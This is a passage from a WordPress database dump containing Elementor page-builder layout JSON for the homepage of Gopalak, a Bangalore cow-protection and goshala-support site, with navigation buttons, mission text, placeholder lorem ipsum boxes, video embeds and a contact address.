us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1579,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\"},{\"id\":1567,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\"},{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9798,1648,'_elementor_page_assets','a:0:{}'),(9811,1650,'_elementor_edit_mode','builder'),(9812,1650,'_elementor_template_type','wp-page'),(9813,1650,'_elementor_version','3.7.8'),(9814,1650,'_wp_page_template','elementor_canvas'),(9815,1650,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1579,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\"},{\"id\":1567,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\"},{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 